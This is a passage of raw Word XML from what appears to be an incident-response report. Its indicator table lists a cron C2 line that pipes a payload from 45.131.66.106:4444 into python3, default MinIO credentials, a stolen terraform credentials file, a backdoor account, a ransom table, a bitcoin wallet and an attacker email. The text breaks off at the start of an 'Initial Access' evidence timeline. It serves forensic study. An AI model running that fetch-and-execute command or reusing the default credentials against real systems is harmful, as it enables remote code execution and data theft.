              </w:rPr>
              <w:t xml:space="preserve">Cron C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="009111E2" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -s http://45.131.66.106:4444/b | python3 -</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="531B0D4D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0A91EF7D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:51</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="5378F5F5" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FF79F6A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="49FA22DC" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>minioadmin:minioadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C1A3C5A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08838C85" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="06BE76C0" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4848B88D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">File stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E53A0C4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>terraform-state/credentials.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="069E84AC" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="09ED5EB1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:30:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="23680B51" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0496BE4B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor acct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="526CB84D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>svc_maint (UID 997)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="665D7E21" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F64F57B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:35:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="265D3EC4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CE4C7AF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransom table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3C775983" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">README_RANSOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C9EF3EC" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D84C5CF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6DE90FEB" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1756E4A0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bitcoin wallet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6EB49809" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D3134C3" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="001FFA36" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="10F684B3" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55300736" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E5472DE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">e78393397@proton.me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4931AD4A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BE804FB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="590129A3" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55421446" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tables dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="445BE019" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>config_info, history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71481318" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7EB3F3D8" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">19:36:37–38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="054A8AA9" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0EE6DD4B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5C2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T1190 — Exploit Public-Facing Application  |  T1059.006 — Python</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6A05A809" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4D965BE7" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="037D1856" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="41035491" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="7DBC9B35" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="4C5B78DB" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="73AF971C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="03AC2F5D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3EC613FE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="698E1F65" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5E02D76B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Syslog</w:t>
            </w:r>
          </w:p>
        </w:tc>
